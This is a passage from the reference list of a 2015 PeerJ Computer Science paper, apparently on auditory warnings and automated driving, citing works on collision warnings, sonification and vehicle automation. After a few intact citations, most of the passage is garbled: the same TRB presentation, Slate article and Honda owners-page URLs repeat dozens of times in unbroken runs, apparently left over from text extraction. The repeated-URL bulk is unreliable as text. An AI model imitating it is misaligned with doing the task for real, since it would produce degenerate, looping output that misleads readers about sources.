2014). Goodall NJ. 2014. Machine ethics and automated vehicles. In: Meyer G, Beiker S, eds. Road vehicle automation. Springer International Publishing, 93–102 DOI 10.1007/978-3-319-05990-7. Gururaj G. 2008. Road traffic deaths, injuries and disabilities in India: current scenario. National Medical Journal of India 21:14–20. Heikoop D, De Winter JCF, Van Arem B, Stanton NA. 2015. Psychological constructs in driving automation: a consensus model and critical comment on construct proliferation (submitted for publication). Hermann T, Hunt A, Neuhoff J. 2011. The sonification handbook. Berlin: Logos Publishing House. Ho C, Reed N, Spence C. 2007. Multisensory in-car warning signals for collision avoidance. Human Factors 49:1107–1114 DOI 10.1518/001872007X249965. Holland S, Morse DR, Gedenryd H. 2002. AudioGPS: spatial audio navigation with a minimal attention interface. Personal and Ubiquitous Computing 6:253–259 DOI 10.1007/s007790200025. Honda. 2014. Forward collision warning. Available at http://owners.honda.com/vehicles/ information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 (accessed 10 November 2014). Howe J. 2006. The rise of crowdsourcing. Wired Magazine 14:1–4. Jamson AH, Merat N, Carsten O, Lai FCH. 2011. Fully-automated driving: the road to future vehicles. In: Proceedings of the sixth international driving symposium on human factors in driver assessment, training and vehicle design, Olympic Valley—Lake Tahoe, CA. 2–9. Jamson AH, Lai FCH, Carsten OMJ. 2008. Potential benefits of an adaptive forward collision warning system. Transportation Research Part C: Emerging Technologies 16:471–484 DOI 10.1016/j.trc.2007.09.003. Jonsson I-M, Dahlbäck N. 2011. I can’t hear you? drivers interacting with male or female voices in native or non-native language. In: Stephanidis C, ed. Universal access in human–computer interaction. Context diversity. Berlin Heidelberg: Springer-Verlag, 298–305. Kessler C, Etemad A, Alessandretti G, Heinig K, Selpi, Brouwer R, Cserpinszky, Hagleitner W, Benmimoun M. 2012. euroFOT—final report (Deliverable D11.3). Aachen, Germany: euroFOT Consortium 2012. Available at http://www.eurofot-ip.eu/download/library/deliverables/ eurofotsp120121212v11dld113 final report.pdf (accessed 13 July 2015). Kingsley K. 2009. Evaluating crash avoidance countermeasures using data from FMCSA/NHTSA’s large truck crash causation study. In: 21st international technical conference on the enhanced safety of vehicles, Stuttgart, Germany. Available at http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/ 09-0460.pdf (accessed 13 July 2015). Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 25/28 https://peerj.com/computer-science/ http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/Gasser.pdf http://dx.doi.org/10.1016/S0003-682X(01)00004-4 http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/2014/10/google_self_driving_car_it_may_never_actually_happen.html http://dx.doi.org/10.1007/978-3-319-05990-7 http://dx.doi.org/10.1518/001872007X249965 http://dx.doi.org/10.1007/s007790200025 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://owners.honda.com/vehicles/information/2014/Accord-Coupe/features/Forward-Collision-Warning/3 http://dx.doi.org/10.1016/j.trc.2007.09.003 